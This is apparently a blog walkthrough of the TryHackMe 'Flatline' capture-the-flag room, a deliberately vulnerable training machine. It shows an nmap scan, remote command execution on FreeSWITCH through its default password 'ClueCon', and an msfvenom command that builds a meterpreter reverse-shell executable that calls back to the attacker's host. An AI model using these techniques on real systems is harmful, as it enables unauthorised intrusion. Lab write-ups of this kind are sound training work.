Flatline THM Walkthrough

Hellloo everyone!…I am back with another walkthrough of a challenge named “Flatline” recently released on TryHackMe. It is an easy machine and based on compromising a windows system, but nothing to worry about, you just need basics to root it. Here is the link to Flatline room: https://tryhackme.com/room/flatline. One more thing you should know, since, the machine given is windows, it will sometimes take few minutes to respond and will even sometimes fail to respond, but don’t get frustrated and try again to get success in rooting the machine. I’ll be hiding the flags, so that you try it yourself and learn something new. So, lets start!

My tryhackme profile : https://tryhackme.com/p/technoreck


Starting with Scanning the machine to find what all ports are open and what service they are running.

nmap -sC -sV -vv -Pn <Target Machine>

Here on Port 8021, we found something interesting, a service named Free SWITCH. Lets see if we can get some exploitation for it on ExploitDB.

Got one Exploit of Command Execution, lets Download it.

Lets try to understand what actually the exploit it doing. So, from the above code we can infer that Free-switch is a kind of gateway with a default password “ClueCon” which allows you to execute any arbitrary command of the host. Lets test it!

Remote Command Execution

noicee! The command worked and we got the name of the User, nekrotic.

Lets Now read the user flag directly using the type command on the user.txt file in the desktop of the user nekrotic.

User Flag

I tried the same with root.txt but it threw an error -ERR no reply.

Now to do the further process and to get the root flag we need a reverse shell for exploiting it. So, we will use msfvenom to make a windows reverse shell payload. Here is the command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > rootkit.exe

Reverse Shell and Root Flag

Now, by starting a http server on our local machine, we will upload upload this rootkit.exe on the host using Command Execution and also start our listener using Metasploit to receive the Connection from the host after the exploit is executed. This process may take some minutes as the machine is slow.

Boom!, here we are in the host’s system.

Now if you try to run the command “net user”, you’ll get to know that the user nekrotic has administrator privileges but then also we are not able to read the root.txt file, why?

So, most probably the permission of accessing the root.txt file has changed to only system and can only be accessed if you are accessing it as a system default account. Let me better explain you this with an image:

See in the image, here though I am the administrator, If I remove the read permission from my privilege for this particular text file, then the SYSTEM is the only one which can access it, but since I am an admin, I can invoke the system call and tell that I am accessing everything as a SYSTEM. So how can I do that, we can do this with this command:


now lets try to read the root.txt file

Voillaa!!! We got the root flag and completed the Challenge.

So this was all from my side, I hope you learnt something new from this and it may had helped you if you were stuck at any moment between the challenge. I’ll see you in the next one, till then learn hacking to hack for good!




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Security updates: Grafana and Log4j

Useful Tutorials

{UPDATE} Thickety Creek Hack Free Resources Generator

Don’t be overconfident when it comes to cyber security

Are Password Resets Costing Your Company?

HTB: Lame Writeup w/o Metasploit

ftp anonymous login

DDoS and DoS Attack with Defense Mechanisms

Understanding kerberos: The single sign on authentication system

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mahendra Kumar

Mahendra Kumar

More from Medium

Hack The Box: Driver

Tryhackme Easy Peasy Walkthrough

Oh My Webserver - WriteUP

Tryhackme crackme0019301933 writeup.